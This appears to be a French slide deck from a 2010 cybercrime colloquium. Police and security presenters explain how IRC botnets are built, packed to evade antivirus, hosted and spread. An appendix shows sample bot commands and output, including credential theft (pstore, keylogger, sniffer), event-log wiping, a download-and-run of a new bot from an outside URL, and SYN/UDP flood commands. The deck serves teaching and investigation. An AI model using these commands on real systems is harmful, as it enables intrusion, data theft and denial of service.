SlideShare une entreprise Scribd logo
1  sur  57
Télécharger pour lire hors ligne
Les Botnets
Colloque sur la cybercriminalité
          Avril 2010




                                   1
Alain Rioux, CISSP
  • Sergent spécialiste, MVDI, BCEDI, 
    Sûreté du Québec, depuis 2005
  • Certifications CISSP, GREM
  • Certificat en informatique, ULaval
  • « Operation Basique »
  • Microsoft LETech 2006‐2008
  • Gold ILECA 2008, Bangkok, Thaïlande
  • Polytechnique, SANS (mentorat)
  • Développeur
                                          2
Michel Cusin, CISSP
 • Consultant en sécurité, Bell Canada
 • Mentor/instructeur SANS Institute
 • Certifications CISSP, CEH, GCIH, OPST, 
   etc…
 • Site cusin.ca




                                         3
Les Botnets


                           Serveur de commande

      Suspect




Bot             Bot       Bot       Bot          Bot


                                                       4
Les Botnets

•   Le programme de bot
•   Création d’un bot
•   Infrastructure du botnet
•   La propagation
•   Autres types de bot
•   Commandes diverses
•   Utilisation du botnet
                                5
Le programme

• Code source compilé en exécutable (.exe)
• Les grandes familles : 
  – Agobot/Phatbot/ForBot/XtremBot
  – SdBot/Rbot/UrBot/RxBot/UrxBot/JrBot
• Intègre le ver et le robot IRC
• Peut se retrouver sous différentes variantes (Ex. 
  NZM, RoseBot, Ruffbot, etc.)

                                                  6
Création

• Les étapes :
  – Code source récupéré sur Internet ou autre moyen
  – Configuration
  – Compilation
  – Compression/Chiffrement
  – Test



                                                       7
Création

• Code source
• Configuration
  – Fichier de configuration
     • Ex. StBot (Stable Bot) 1.0
  – Générateur de configuration
     • Ex. Agobot
• Compilation
  – Ex. MS Visual Studio, GCC, etc.
                                      8
Création

• Générateur d’exécutable




                            www.megasecurity.org
                                                   9
Création

• Packing : Compression/Chiffrement
  – Réduire la taille de l’exécutable
  – Éviter la détection par les anti‐virus
  – Protéger le code contre la rétro‐ingénierie
• Outil : le packer
• Ex. UPX, Armadillo, PECompact, RLPack, 
  Neolite, Morphine, Themida, PELock, etc.

                                                  10
Création




           11
Test

• Antivirus en ligne (multi‐moteurs)
  – www.virustotal.com
  – virusscan.jotti.org
  – www.novirusthanks.org
  – virus‐trap.org
  – www.virscan.org
  – www.viruschief.com
  – www.filterbit.com
                                       12
13
Infrastructure

• Serveur de commande et contrôle
  – Type : IRC, HTTP, P2P, etc.
  – Hébergement
  – Adresse IP ou nom de domaine
• Hébergement des ressources (programme de 
  bots pour les mises à jour)
• Si nom de domaine, enregistrement et DNS

                                              14
Infrastructure

• Type de serveur
  – IRC
     • Simple, rapide, documentée et disponibilité
     • Moins convivial (ligne de commande), Pare‐feu
     • Ex. UnRealIRCd, BewareIRCd, Ultimate, InspIRCd, etc.
  – HTTP
     • Port 80 (Pare‐feu), Convivial (GUI en HTML)
  – P2P
     • Décentralisé
                                                              15
Infrastructure




                 16
Infrastructure




                                       17
            Source : securitylabs.websense.com
Source : pandasecurity.com
                             Infrastructure




 18
Infrastructure

• Hébergement
  – Un ordinateur du pirate ou un ami
  – Un serveur IRC existant (Ex. Undernet)
  – Un serveur dédié (payé frauduleusement ou non)
  – Un bot performant (serveur ou non)
  – Une grappe de bots performants (cluster)
• Hébergement des ressources
  – Fournisseurs gratuits (iquebec.com, voila.fr, 
    freewebs.com, etc.)                              19
Infrastructure

• DNS
   – DNS dynamique : un domaine, une adresse IP variable : 
     ex.No‐IP.org, dyndns.com, yi.org, etc.
   – DNS Round Robbin (un domaine, plusieurs adresses IP 
     choisies en alternance)
   – DNS Netmaskordering (Comme RR, mais avec priorité basée 
     sur la comparaison des masques)

N.B. : Le nom de domaine pointe directement sur le serveur de
commande et contrôle. Ceci représente le point le plus
vulnérable du botnet. Solution : Le Fast‐Flux.                  20
Fast‐flux
 Single‐Flux




Source : www.xmcopartners.com   21
Fast‐flux 
   Double‐flux




Source : www.xmcopartners.com   22
Infrastructure

• Encore plus loin : Web 2.0 Botnet
  – Twitter
  – Facebook
  – Google/Ajax
  – Etc.




                                      23
Propagation

• Deux activités : Balayage (scan) et Infection
• Dans  un  bot  traditionnel,  c’est  le  ver  qui 
  accomplit ces tâches, il peut être autonome ou 
  semi‐autonome
• Il recherche une ou plusieurs vulnérabilités (Ex. 
  DCOM, SMB, ASN, VNC, etc.) 

• Démonstration : Autonome
                                                 24
Autonome




           25
Autonome




           26
Semi‐autonome


    Scan 24.72.x.x ->       Bot    24.72.130.224
    Faille x



                            Bot
                                   24.72.130.225
Suspect                           Faille x présente
      Serveur de commande
                            Bot



                                  24.72.130.226
                            Bot
                                                      27
Semi‐autonome


                            Bot



                            Bot   Bot : 24.72.130.225
Suspect
      Serveur de commande
                            Bot



                            Bot
                                                        28
Semi‐autonome

Commande de balayage :

Pirate!kktr@Longueuil‐A31682EC.mc.videotron.ca TOPIC #botnet : .advscan asn1smb 75 5 0 201.4.x.x


Balayage commandé et infection automatique : 

CAN|XP|SP1|00|2633|W|548!eabt@142‐217‐78‐77.telebecinternet.net PRIVMSG #botnet :FTP File transfer
complete: 201.4.134.6     Infection par un autre bot
BRA|XP|SP1|00|1500|W|957!vtpxe@201.4.134.6 JOIN : #botnet             Nouveau bot
BRA|XP|SP1|00|1500|W|957!vtpxe@201.4.134.6 PRIVMSG #botnet : [SCAN]: Random Port Scan started on 
201.4.x.x:445 with a delay of 5 seconds for 0 minutes using 75 threads. 

CAN|XP|SP1|00|2633|W|548!eabt@142‐217‐78‐77.telebecinternet.net PRIVMSG #botnet :FTP File transfer
complete: 201.4.136.102
BRA|XP|SP0|00|3066|W|771!vbf@201.4.136.102 JOIN : #botnet
BRA|XP|SP0|00|3066|W|771!vbf@201.4.136.102 PRIVMSG #botnet : [SCAN]: Random Port Scan started on 
201.4.x.x:445 with a delay of 5 seconds for 0 minutes using 75 threads.
                                                                                                     29
Vulnérabilités

Statistiques d’infection :

<@Pirate> .stats
<CAN|XP|SP1|00|2633|W|548> [SCAN]: Exploit Statistics: Dcom135: 0, Dcom445: 0, Dcom1025: 0, asn1http: 0, 
asn1smb: 4625, asn1smbnt: 0, vnc: 0, netapi: 0, sym: 0, Total: 4625


Balayage VNC (faille authbypass) :

<@Pirate> .asc vnc 100 5 200 170.x.x.x ‐s
<[F]CZE|765771811> ‐ Vnc ‐ trying to root 170.123.234.19 ‐ nopass ;)  ‐
<BRA|137791145> ‐ Vnc ‐ 170.123.213.191 ‐ password ‐:12345
<ESP|37523> ‐ Vnc ‐ 170.126.235.164 ‐ password ‐:12345
<[F]POL|962379907> ‐ Vnc ‐ 170.126.165.91 ‐ password ‐:123456




                                                                                                       30
Autres types

• Autres types de bots
  – IRC Bot
  – « Web » Bot
  – Autres outils




                                   31
Le IRC Bot

• Robot IRC convertit en méchant Robot
  – Exemple de Robot IRC : Eggdrop, Windrop, 
    EnergyMech (Emech), Cygmech, WinMech, Darkbot, 
    etc.
• Modifications : Furtivité, Porte dérobée, etc.
• Pas de ver intégré
• Installation « à la main »

• Démonstration : Eggdrop                          32
Le Web Bot

• Créé avec les nouveaux langages du Web : Java, 
  PHP, ASP, Perl, etc.
• Ciblent précisément les serveurs Web
  – Exemples : 
     • W32.Storm.Worm (2001)
     • PHP Bot




                                              33
PHP Bot




• Bot écrit en PHP
• Exploite le RFI
                               34
Autres outils

• BNC ou bouncer : plus qu’un proxy IRC, permet de 
  maintenir une connexion permanente. Ex. PsyBNC
• Vhost : Avec BNC ou HostServ




                                                      35
Conclusion

• Conséquences et utilisations des botnets
   – Perturbation  des  communications :  volontaire 
     (flood)  ou  involontaire  (consommation  de 
     ressources comme les pourriels)
   – Perturbation  des  systèmes :  Infection  virale,  coût 
     en ressources humaines et matériels (ex. antivirus)
   – Fraude au clic : régies publicitaires, concours, etc.
   – Warez : vol de licences, hébergement sur les bots
   – Web Defacement et méfaits : attaques DDoS
                                                          36
Conclusion

– Vol d’identité de masse : pstore, sniffer, keylogger, 
  accès aux fichiers
– Hameçonnage : hébergement du faux site, serveur 
  SMTP pour les pourriels, obtention d’accès sur des 
  sites bancaires
– Extorsion : menace d’utilisation du botnet
– Espionnage et vol de données
– Cyberterrorisme
– Cyberguerre
                                                     37
Source :      38
www.nytimes.com
Conclusion

• À venir
   – La prévention
   – La détection
   – L’éradication (décontamination)
   – L’investigation
   – La mise en accusation et la condamnation



                                                39
Questions ?


        Encore plus...

     Liste de commandes
        Avec exemples



                          40
Commandes

• Informations  sur  l’hôte :  ordinateur,  système 
  d’exploitation,  paramètres  réseau,  liste  de  processus, 
  base de registre, etc.
• Informations  sur  le  bot :  uptime,  installation,  version, 
  liste des contrôleurs, threads, etc.
• Déplacements  :  clônage,  joindre  ou  quitter  une 
  chambre, se reconnecter, etc.
• Démarrer  un  service :  serveur  HTTP,  FTP,  IRC,  SMTP, 
  proxy, etc.
                                                              41
Commandes

• Espionnage  et  vol  de  données :  liste  des  fenêtres 
  actives,  capture  d’écran,  utiliser  la  webcam,  parcours 
  du  système  de  fichiers,  vol  des  licences,  keylogger, 
  sniffer, pstore, etc.
• Entretien  du  système :  session  distante,  effacer  les 
  logs,  enlever  les  autres  bots,  télécharger  une  mise  à
  jour, etc.
• Attaques et fraudes : attaques DDoS, fraudes au clic


                                                            42
Commandes

Informations système :
<@Pirate> [00|TWN|XP|SP0]‐277701 .si
<[00|TWN|XP|SP0]‐277701> ‐ sysinfo ‐ CPU : 1600MHz.  RAM : 1,048,048KB total, 1,048,048KB free.  
Disk : 20,482,840KB total, 2,578,028KB free.  OS : Windows XP (5.1, Build 2600). Sysdir : D:WINDOWSSystem32
Hostname : guiltpun‐x5q2g9 (170.125.200.173). Current User : guiltpunish.  Date : 20:Feb:2008. Time : 10:05:26.
Uptime : 0d 1h 12m.

<@Pirate> ‐uname
<zlw281> Linux somebot1.com 2.6.19.2 #2 SMP Sun Jan 14 04:15:38 CET 2007 i686 Linux
<reg279> FreeBSD somebot2.com 6.2‐STABLE FreeBSD 6.2‐STABLE #0: Tue Jan 23 12:44:26 IRKT 2007
root@v23.ispsystem.net:/usr/obj/usr/src/sys/ISPSYSTEM i386 FreeBSD


Informations réseau :
<@Pirate> .ni
<[00|USA|1821> [ NETINFO ] [Connection Type]: LAN (LAN Connection). [Internal IP]: 129.93.231.166. [External
IP]: 125.103.251.136. [Hostname]: somebot..edu. [Private]: No.[Country]: United States.[Speedtest]: Upload:
92.56 KB/s, Download: 144.35 KB/s.[Bandwidth]: Downloaded: 767MB, Uploaded: 798MB.
                                                                                                            43
Commandes

Liste de processus :
<@Pirate> .ps list
<[P24|USA|44184]> [PROC] Process List:
<[P24|USA|44184]>  144   ‐ 60 K      ‐ "SystemRootSystem32smss.exe"
<[P24|USA|44184]>  168   ‐ 1,660 K   ‐ "??C:WINNTsystem32csrss.exe"
<[P24|USA|44184]>  188   ‐ 2,860 K   ‐ "??C:WINNTsystem32winlogon.exe"
<[P24|USA|44184]>  216   ‐ 3,076 K   ‐ "C:WINNTsystem32services.exe"
<[P24|USA|44184]>  228   ‐ 1,440 K   ‐ "C:WINNTsystem32lsass.exe"
<[P24|USA|44184]>  404   ‐ 2,008 K   ‐ "C:WINNTsystem32svchost.exe"
...
<[P24|USA|44184]>  8256  ‐ 2,112 K   ‐ "C:Program FilesInternet Exploreriexplore.exe"
<[P24|USA|44184]>  8976  ‐ 13,020 K  ‐ "C:Program FilesMSN Messengermsnmsgr.exe"
<[P24|USA|44184]>  4088  ‐ 3,696 K   ‐ "C:winntsystem32minimech.exe"
<[P24|USA|44184]> [PROC] End of list.




                                                                                           44
Commandes

Base de registre :
<@Pirate> .reg query HKLM SoftwareMicrosoftWindowsCurrentVersionRun
<[D01|ISR|86665]> (03) SoftwareMicrosoftWindowsCurrentVersionRunIntec Drivers32 (REG_SZ)
<[D01|ISR|86665]> (04) SoftwareMicrosoftWindowsCurrentVersionRunIntec Service Drivers (REG_SZ)
<[D01|ISR|86665]> (05) SoftwareMicrosoftWindowsCurrentVersionRunNeroCheck (REG_SZ)
...
<[D01|ISR|86665]> [ REG ] Done with query: HKLMSoftwareMicrosoftWindowsCurrentVersionRun


Threads du bot :
<@Pirate> .t
<ie4[hax]‐311> [ Worms SDThreads ]
<ie4[hax]‐311> 0: Main thread
<ie4[hax]‐311> 1: Firewall/AntiVirus/Exe Killer Mood By Pirate
<ie4[hax]‐311> 2: Keys logging to C:WINNTsystem32system.dll
<ie4[hax]‐311> 3: NTScan
<ie4[hax]‐046> 4: [Keylogger] logging to #botnet‐keylog
<ie4[hax]‐046> 5: [HTTPD] Server listening on port: 8080 root dir: c:
                                                                                                      45
<ie4[hax]‐311> [ Worm SPYThreads ]
Commandes

Durée de vie (uptime) :
<@Pirate> .up
<[P16|GBR|48359]> [ MAIN ] Uptime: 16 days 14:52, Record Uptime: 30 days 06:54.


Date de l’installation :
<@Pirate> .it
<[P20|USA|82515]> [ MAIN ] Bot Installer Sur: 06/20/2006, 08:15 PM.


Information sur le bot :
<@Pirate> !version
<ilgw845> pHp bOt v1


Liste de contrôleurs (login) :
<@Pirate> .who
<[P12|USA|18490]> [ MAIN ] Login List:
<[P12|USA|18490]> <0> Pirate!user@username.users.undernet.org
<[P12|USA|18490]> [ MAIN ] Login List complete.                                   46
Commandes

Clônage :
<@Pirate> .clone us.undernet.org 6667 #botnet ‐s
<BEL|87258> ‐ clones  ‐ Created on us.undernet.org:6667, in channel #botnet.


Joindre une chambre :
<@Pirate> .join #botnet2
* Joins: ie[hax]‐3690 (~iehax‐51@dhcp‐0‐8‐a1‐10‐32‐76.cpe.beld.net)


Quitter une chambre :
<@Pirate> .part #botnet2
* Parts: ie3[hax]‐690 (~ie3hax‐6@modemcable035.85‐37‐24.mc.videotron.ca)


Se reconnecter :
<@Pirate> .reconnect
* Quits: USA|46263 (~xwyqy@adsl‐68‐92‐219‐167.dsl.hstntx.swbell.net) (Quit: reconnecting)
* Quits: USA|07769 (iogcvdu@cpe‐74‐76‐81‐213.nycap.res.rr.com) (Quit: reconnecting)
                                                                                            47
Commandes

Démarrer un serveur :
<@Pirate> .httpd 8080 c:
<ie[hax]‐0724> [ HTTPD ] Server commencer sur http://somebot1.com:8080
<[04]ax]‐9323> [ HTTPD ] Server commencer sur http://somebot2.com:8080


Démarrer un proxy :
<@Pirate> .redirect 9696 Oslo1.NO.EU.undernet.org 6666
<h4ck3d‐005> TCP Redirect created on port 9696 to Oslo1.NO.EU.undernet.org:6666.
<h4ck3d‐033> TCP Redirect created on port 9696 to Oslo1.NO.EU.undernet.org:6666.


Liste des fenêtres actives :
<@Pirate> .aw
<ie2[hax]‐317> Fenetre active: Multicam Surveillance System 7.0.
<ie3[hax]‐778> Fenetre active: VoyagesDestination ‐ www.voyagesdestination.com ‐ Mozilla Firefox.
<[30]hax]‐216> Fenetre active: Windows Live Hotmail ‐ Microsoft Internet Explorer.
<ie4[hax]‐109> Fenetre active: NOD32 Scanner ‐ [Mi perfil].
<ie3[hax]‐743> Fenetre active: iTunes.                                                              48
Commandes

Lister les disques :
<@Pirate> .di
<[00|USA|4272> [DRIVES] Listing drives:
<[00|USA|4272> Disk Drive (C:), total: 244,196,000KB, free: 233,507,040KB, available: 233,507,040KB.
<[00|USA|4272> Disk Drive (D:), total: 244,196,000KB, free: 243,979,700KB, available: 243,979,700KB.
<[00|USA|4272> Cdrom Drive (E:): Failed to stat, device not ready.
<[00|USA|4272> Drive Totals (N/A), total: 488,392,000KB, free: 477,486,740KB, available: 477,486,740KB.
<[00|USA|4272> [DRIVES] End of list.


Capture d’écran :
<@Pirate> .sc c:desktop.gif
<ie4[hax]‐046> Screen capture saved to c:desktop.gif.


Utiliser la webcam :
<@Pirate> .ckeckcam
<ie3[hax]‐976> [WebCAM On] Asti de cochon que jte voille pas mespionner le cul
                                                                                                          49
Commandes

Vol de licences :
<@Pirate> .cdkeys
<Wo|rM‐663> Microsoft Windows Product ID CD Key: (55194‐640‐0013789‐26509).
<Wo|rM‐663> [CDKEYS]: Recherche Completer.


Protected Storage Data (Internet Explorer) :
<@Pirate> .pstore
<[D01|ISR|86665]> [ PSTORE ] IE Auto‐Complete: http://somesite1.com/, usager:motdepasse
<[D01|ISR|86665]> [ PSTORE ] IE Auto‐Complete: http://somesite2.com/somepage.php, usager:motdepasse


Reniflage de paquets (sniffing) :
<@Pirate> .sniffer
<[00|ESP|855685]> [ SNIFFER ] Started packet sniffer.
<[00|ESP|855685]> IRC sniff "210.84.47.226:2402" to "66.54.229.120:1863": ‐ « ... »
<[00|ESP|855685]> HTTP sniff « 197.56.16.12:80" to "210.84.47.226:2501": ‐ « ... »


                                                                                                      50
Commandes

Enregistreur de clavier (keylogging) :
<@Pirate> .keylog #botnet‐keylog
<[05]ax]‐3480> [Keylogger] Started (logging to: #botnet‐keylog)
<[05]ax]‐3480> (MSN Hotmail ‐ Nouveau message ‐ Microsoft Internet Explorer):  ... ( Return )
<[05]ax]‐3480> (Courrier :: Bienvenue à Agora ‐ Microsoft Internet Explorer):  ..[TAB]...[TAB][TAB] ( Return )
<ie3[hax]‐808> (Solutions en ligne ‐ AccèsD ‐ Microsoft Internet Explorer): .... (Changed window)


Effacer les logs :
<@Pirate> „x47x49x96
<[02|CAN|2142> ‐=[  BOT  ]=‐ Cleared 3/3 event logs.
<@Pirate> „x42x40x8Fx57x13x86xB9x22
<[02|CAN|2142> ‐=[  BOT  ]=‐ DNS cache flushed.
<@Pirate> „x42x40x8Fx57x13x83xA5x21
<[02|CAN|2142> ‐=[  BOT  ]=‐ ARP cache flushed.




                                                                                                                 51
Commandes

Session en ligne de commande :
<@Pirate> .opendos
<ie[hax]‐069> [[1]CMD[1]] Active
<ie[hax]‐069> Microsoft Windows 2000 [Version 5.00.2195]
<ie[hax]‐069> (C) Copyright 1985‐2000 Microsoft Corp.
<ie[hax]‐069> Z:>
<@Pirate> .cmd dir
<ie[hax]‐069> dir
<ie[hax]‐069>  Volume in drive Z is System
<ie[hax]‐069>  Volume Serial Number is 1234‐35BB
<ie[hax]‐069>  Directory of Z:
<ie[hax]‐069> 04/12/2006  09:39a      <DIR>          .
<ie[hax]‐069> 04/12/2006  09:39a      <DIR>          ..
... [Liste des fichiers] ...
<ie[hax]‐069>              194 File(s)     23,236,499 bytes
<ie[hax]‐069>               52 Dir(s)  20,903,641,088 bytes free
<ie[hax]‐069> Z:>
                                                                   52
Commandes

« Killer » les autres bots :
<@Pirate> .pl
<ie4[hax]‐548>  [System Process] System SMSS.EXE CSRSS.EXE WINLOGON.EXE SERVICES.EXE LSASS.EXE
svchost.exe ccSetMgr.exe ccEvtMgr.exe SPBBCSvc.exe spoolsv.exe DWRCS.EXE svchost.exe NPFMntor.exe
regsvc.exe mstask.exe MSupdate.exe WinMgmt.exe svchost.exe explorer.exe DWRCST.EXE nero.exe iexplore.exe
WININET.EXE ccApp.exe svchostt.exe inkjet.exe sounds.exe iexplore.exe svchostt.exe sounds.exe symlcsvc.exe
wuauclt.exe
<@Pirate> .kp svchostt.exe


Télécharger un nouveau bot :
<@Pirate> .download http://membres.lycos.fr/pirate/winsys.exe winsys.exe 1  
<[21][F]RoSe444271> downloading http://membres.lycos.fr/pirate/winsys.exe...  
<[21][F]RoSe444271> downloaded 72.9 kb to winsys.exe @ 72.9 kb/sec.  
<[21][F]RoSe444271> opened winsys.exe. 




                                                                                                       53
Commandes

Fraude au clic ‐ Régies Publicitaires :
<@Pirate> @open http://pirate.somesite.com/     Page contenant publicité
<[2]ujfgpzgmkjb> file opened.
<[2]sciuvmymwf> file opened.


Synflood :
<@Pirate> !syn 24.212.36.215 113 50
<[21]USA|760760273> [SYN]: Flooding: (24.212.36.215:113) for 50 seconds.
<[5]USA|084308781> [SYN]: Flooding: (24.212.36.215:113) for 50 seconds.
<[21]USA|760760273> SYN// Done with flood (35KB/sec).
<[5]USA|084308781> SYN// Done with flood (129KB/sec).

<@Pirate> .ddosbox 208.114.100.12
<ie[hax]‐4108> DrDos Random Ack/Synflooding [208.114.100.12] for 50 seconds
<ie[hax]‐9284> DrDos Random Ack/Synflooding [208.114.100.12] for 50 seconds
<ie[hax]‐4108> Done with DrDos Random Ack/Syn flood [18KB/sec]
<ie[hax]‐9284> Done with DrDos Random Ack/Syn flood [480KB/sec]
                                                                              54
Commandes

UDP :
<@Pirate> !udp 202.106.133.140 0 99999999
<ux766> Udp send to 202.106.133.140 delays 99999999 seconds
<dodh546> Udp send to 202.106.133.140 delays 99999999 seconds
<mmj996> Udp send to 202.106.133.140 delays 99999999 seconds

<@Pirate> .wisdom.udp 159.171.175.141 2048 4096 50
<USA|949449114> ‐ wisdom(udp) ‐ Sending packets to 159.171.175.141...
<[33][F]BRA|015201859> ‐ wisdom(udp) ‐ Sending packets to 159.171.175.141...


Ping :
<@Pirate> .ping 24.122.166.215 1000 4096 100
<DEU|24523> ‐ ping  ‐ Sending 1000 pings to 24.122.166.215. packet size: 4096, timeout: 100(ms).
<CAN|64836> ‐ ping  ‐ Sending 1000 pings to 24.122.166.215. packet size: 4096, timeout: 100(ms).




                                                                                                   55
Commandes

IRC Message Flood :
<@Pirate> ‐insult SomeUser       Un autre usager IRC
<Oimec4945> (SomeUser) You are so stupid you couldn't pour piss out of a boot if the  instructions were written
on the bottom of the heel.
<__mech‐__> (SomeUser) There's nothing wrong with you that a miracle couldn't cure...
<PaNaDooLa> (SomeUser) For a minute there I didn't recognize you. It was the happiest minute of my life.
<IrcL3aDeR> (SomeUser) Do YOU ever get tired of having yourself around?

Une chambre, ex.. #montreal
<@Pirate> !privmsg #montreal POUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHA
HAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHA
HAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHA
HAHAHAHAHAHAHAHAHAHAHA




                                                                                                             56
Les Botnets
Colloque sur la cybercriminalité
           Mai 2010




                                   57

Contenu connexe

Tendances

Conférence Shinken à SophiaConf2012 (Jean Gabès)
Conférence Shinken à SophiaConf2012 (Jean Gabès)Conférence Shinken à SophiaConf2012 (Jean Gabès)
Conférence Shinken à SophiaConf2012 (Jean Gabès)Jean Gabès
 
Mises à jour logicielles en environnement Linux Embarqué, petit guide et tour...
Mises à jour logicielles en environnement Linux Embarqué, petit guide et tour...Mises à jour logicielles en environnement Linux Embarqué, petit guide et tour...
Mises à jour logicielles en environnement Linux Embarqué, petit guide et tour...Pierre-jean Texier
 
Mise à jour d’un système Linux embarqué « Over The Air »
Mise à jour d’un système Linux embarqué « Over The Air »Mise à jour d’un système Linux embarqué « Over The Air »
Mise à jour d’un système Linux embarqué « Over The Air »Pierre-jean Texier
 
Prévention et traitement du hack de serveurs
Prévention et traitement du hack de serveursPrévention et traitement du hack de serveurs
Prévention et traitement du hack de serveursAmen.fr
 

Tendances (6)

Conférence Shinken à SophiaConf2012 (Jean Gabès)
Conférence Shinken à SophiaConf2012 (Jean Gabès)Conférence Shinken à SophiaConf2012 (Jean Gabès)
Conférence Shinken à SophiaConf2012 (Jean Gabès)
 
Mises à jour logicielles en environnement Linux Embarqué, petit guide et tour...
Mises à jour logicielles en environnement Linux Embarqué, petit guide et tour...Mises à jour logicielles en environnement Linux Embarqué, petit guide et tour...
Mises à jour logicielles en environnement Linux Embarqué, petit guide et tour...
 
Comprendre la securite web
Comprendre la securite webComprendre la securite web
Comprendre la securite web
 
Mise à jour d’un système Linux embarqué « Over The Air »
Mise à jour d’un système Linux embarqué « Over The Air »Mise à jour d’un système Linux embarqué « Over The Air »
Mise à jour d’un système Linux embarqué « Over The Air »
 
Serveur Zabbix
Serveur ZabbixServeur Zabbix
Serveur Zabbix
 
Prévention et traitement du hack de serveurs
Prévention et traitement du hack de serveursPrévention et traitement du hack de serveurs
Prévention et traitement du hack de serveurs
 

En vedette

Botnets presentation
Botnets presentationBotnets presentation
Botnets presentationMahmoud Ibra
 
Botnet Detection Techniques
Botnet Detection TechniquesBotnet Detection Techniques
Botnet Detection TechniquesTeam Firefly
 
Ccnn2eso cat 004
Ccnn2eso cat 004Ccnn2eso cat 004
Ccnn2eso cat 004mvicensm
 
Taller1 internet deisy
Taller1  internet deisyTaller1  internet deisy
Taller1 internet deisyfucs
 
La vente de votre maison
La vente de votre maisonLa vente de votre maison
La vente de votre maisonA-CHAT.CA
 
El cazo de lorenzo
El cazo de lorenzoEl cazo de lorenzo
El cazo de lorenzoPlof
 
Como abrir una puerta.................
Como abrir una puerta.................Como abrir una puerta.................
Como abrir una puerta.................Refuerzo
 
04 20110222 presentation_module_adresse_siglr
04 20110222 presentation_module_adresse_siglr04 20110222 presentation_module_adresse_siglr
04 20110222 presentation_module_adresse_siglrDIOT Clément
 
Helvecia edicion numero 1 4 feb.1914
Helvecia edicion numero 1  4 feb.1914Helvecia edicion numero 1  4 feb.1914
Helvecia edicion numero 1 4 feb.1914Marcos Bertino
 
seconde présentation Paulwen
seconde présentation Paulwenseconde présentation Paulwen
seconde présentation Paulwenpaulwen
 
Incormporacion de las NNTT
Incormporacion de las NNTTIncormporacion de las NNTT
Incormporacion de las NNTTtcardenas83
 
Pl 625 extinción de dominio
Pl 625 extinción de dominioPl 625 extinción de dominio
Pl 625 extinción de dominioAlejandra Prado
 
Corruption 2010
Corruption 2010Corruption 2010
Corruption 2010melclalex
 

En vedette (20)

Botnets presentation
Botnets presentationBotnets presentation
Botnets presentation
 
BOTNET
BOTNETBOTNET
BOTNET
 
Botnet
Botnet Botnet
Botnet
 
Botnet Detection Techniques
Botnet Detection TechniquesBotnet Detection Techniques
Botnet Detection Techniques
 
La moderación en doc tic
La moderación en doc ticLa moderación en doc tic
La moderación en doc tic
 
Ccnn2eso cat 004
Ccnn2eso cat 004Ccnn2eso cat 004
Ccnn2eso cat 004
 
Taller1 internet deisy
Taller1  internet deisyTaller1  internet deisy
Taller1 internet deisy
 
La vente de votre maison
La vente de votre maisonLa vente de votre maison
La vente de votre maison
 
El baile
El baileEl baile
El baile
 
Routers
RoutersRouters
Routers
 
El cazo de lorenzo
El cazo de lorenzoEl cazo de lorenzo
El cazo de lorenzo
 
Como abrir una puerta.................
Como abrir una puerta.................Como abrir una puerta.................
Como abrir una puerta.................
 
04 20110222 presentation_module_adresse_siglr
04 20110222 presentation_module_adresse_siglr04 20110222 presentation_module_adresse_siglr
04 20110222 presentation_module_adresse_siglr
 
Helvecia edicion numero 1 4 feb.1914
Helvecia edicion numero 1  4 feb.1914Helvecia edicion numero 1  4 feb.1914
Helvecia edicion numero 1 4 feb.1914
 
Pq service gamma mémory
Pq service gamma mémoryPq service gamma mémory
Pq service gamma mémory
 
seconde présentation Paulwen
seconde présentation Paulwenseconde présentation Paulwen
seconde présentation Paulwen
 
Incormporacion de las NNTT
Incormporacion de las NNTTIncormporacion de las NNTT
Incormporacion de las NNTT
 
Trabajo 3
Trabajo 3Trabajo 3
Trabajo 3
 
Pl 625 extinción de dominio
Pl 625 extinción de dominioPl 625 extinción de dominio
Pl 625 extinción de dominio
 
Corruption 2010
Corruption 2010Corruption 2010
Corruption 2010
 

Similaire à Colloque cyber 2010 les botnets

How with Suricata you save the world - NDH2K14
How with Suricata you save the world - NDH2K14How with Suricata you save the world - NDH2K14
How with Suricata you save the world - NDH2K14Sebastien Larinier
 
Comment analyser une machine linux compromise
Comment analyser une machine linux compromiseComment analyser une machine linux compromise
Comment analyser une machine linux compromiseTarek MOHAMED
 
Hacking your Home @bdx.io
Hacking your Home @bdx.ioHacking your Home @bdx.io
Hacking your Home @bdx.iolaurenthuet
 
ASFWS 2013 - Optimiser ses attaques Web avec Burp par Nicolas Grégoire
ASFWS 2013 - Optimiser ses attaques Web avec Burp par Nicolas GrégoireASFWS 2013 - Optimiser ses attaques Web avec Burp par Nicolas Grégoire
ASFWS 2013 - Optimiser ses attaques Web avec Burp par Nicolas GrégoireCyber Security Alliance
 
Sécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseSécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseAntonio Fontes
 
Petit potam slides-rtfm-ossir
Petit potam slides-rtfm-ossirPetit potam slides-rtfm-ossir
Petit potam slides-rtfm-ossirLionelTopotam
 
Présentation Microsoft Advanced Threat Analytics | Deep-Dive - MSCloud Summi...
Présentation Microsoft Advanced Threat Analytics  | Deep-Dive - MSCloud Summi...Présentation Microsoft Advanced Threat Analytics  | Deep-Dive - MSCloud Summi...
Présentation Microsoft Advanced Threat Analytics | Deep-Dive - MSCloud Summi...☁️Seyfallah Tagrerout☁ [MVP]
 
.NET Microframework: du code, de l&rsquo;électronique, de la robotique
.NET Microframework: du code, de l&rsquo;électronique, de la robotique.NET Microframework: du code, de l&rsquo;électronique, de la robotique
.NET Microframework: du code, de l&rsquo;électronique, de la robotiqueMicrosoft
 
Réseaux-et-Sécurité.pdf
Réseaux-et-Sécurité.pdfRéseaux-et-Sécurité.pdf
Réseaux-et-Sécurité.pdfMoufidaHajjaj
 
Programmation web asynchrone avec Tornado
Programmation web asynchrone avec TornadoProgrammation web asynchrone avec Tornado
Programmation web asynchrone avec TornadoRonan Amicel
 
F5 ltm administering big ip v11
F5 ltm administering big ip v11F5 ltm administering big ip v11
F5 ltm administering big ip v11Amine Haddanou
 
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...Trésor-Dux LEBANDA
 
3 Microsoft Advanced Threat Analytics - Genève
3   Microsoft Advanced Threat Analytics - Genève3   Microsoft Advanced Threat Analytics - Genève
3 Microsoft Advanced Threat Analytics - GenèveaOS Community
